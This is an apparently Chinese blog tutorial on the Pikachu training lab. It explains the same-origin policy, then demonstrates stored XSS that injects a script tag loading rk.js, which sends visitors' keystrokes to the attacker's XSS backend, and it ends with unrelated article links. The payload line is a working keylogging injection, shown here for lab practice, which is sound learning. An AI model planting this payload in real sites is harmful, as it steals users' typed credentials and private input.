pikachu之xss获取键盘记录

前备知识

跨域

跨域(Cross-Origin)是指在互联网中,浏览器为了保护用户信息安全而实施的一种安全策略------同源策略(Same-Origin Policy),即浏览器禁止一个域上的文档或者脚本(如通过JavaScript发起的HTTP请求)与另一个域上的资源进行交互,除非明确授权。

具体来说,如果两个网页的协议(HTTP/HTTPS)、域名、端口号完全一致,就被认为是同源。若从一个源(例如,域A)加载的网页中的脚本尝试访问或操作另一个不同源(例如,域B)的资源,这种行为就会被浏览器阻止,从而出现"跨域"问题。

跨域的主要目的是防止恶意网站通过嵌入的脚本获取并利用另一个网站的内容,比如用户的敏感信息,以避免诸如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等安全风险。

解决跨域问题的方法有多种,包括但不限于:

  • CORS(Cross-Origin Resource Sharing,跨源资源共享):服务器通过响应头允许特定源进行跨域访问。
  • JSONP(JSON with Padding):通过动态创建<script>标签绕过同源策略,适用于GET请求。
  • WebSocket可以通过指定协议握手实现跨域通信。
  • 服务端代理:将请求转发到其他服务器,返回结果给客户端,让客户端看起来像是在和服务端同源通信。
  • window.postMessage API:在不同窗口间进行跨域通信。
  • WebRTC等现代Web技术也有相应的跨域机制。

通过存储xss漏洞,注入xss代码,进而获得用户的键盘记录

环境准备

1.安装好pikachu及其的后台

2.文件处理

1.rk.js 在pikachu\pkxss\rkeypress目录下

注:上述网址一定要与本机部署的pikachu的网址一致才行,此网址也为攻击者的文件网址

此处我的pikachu网址直接为localhost,即127.0.0.1

本质该网址就为http://+'pikachu网址'+/pkxss/rkeypress/rkserver.php

实战

先上payload:

复制代码
<script  src=" http://127.0.0.1/pkxss/rkeypress/rk.js">  </script> 

注意:payload对应的网址也应与rs.js文件中的网址一致

查看控制台,如果有除了以下的显示内容,可能就是上述网址填错了,请认真修改!

此时,我们已经将rk.js文件上传到了被攻击者网站中,当有人访问该网页,并留言,我们就可以在xss后台看到该人的键盘记录,如下演示

去往pikachu后台,即可查看到

总结

此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!

相关推荐
丨我是张先生丨7 分钟前
日语单词 Web Page
前端·css·css3
禅思院2 小时前
AI对话前端从入门到崩溃:一个长对话引发的五层优化战争【引子】
前端·面试·架构
TrisighT2 小时前
Electron 鸿蒙 PC 上点外链唤醒应用,我试了 6 种写法只有 1 种能跑
前端·electron·harmonyos
2501_930707782 小时前
如何将HTML文件转换为纯文本(详细步骤指南)
前端·html
天才熊猫君3 小时前
配置与数据分离:一种可视化搭建的属性编辑方案
前端·javascript
林希_Rachel_傻希希3 小时前
web性能之相关路径——AI总结
前端·javascript·面试
竹林8183 小时前
用 wagmi v2 踩坑两天,我终于搞懂了多链钱包切换在 DeFi 前端中的正确姿势
前端·javascript
用户2136610035723 小时前
Vue项目搜索功能与面包屑导航
前端·javascript
星栈4 小时前
LiveView 的实时通信,爽是爽,但 PubSub 和广播也最容易把自己绕晕
前端·前端框架·elixir
用户2930750976694 小时前
告别关键词匹配,拥抱向量语义 —— RAG 搜索从零到一
前端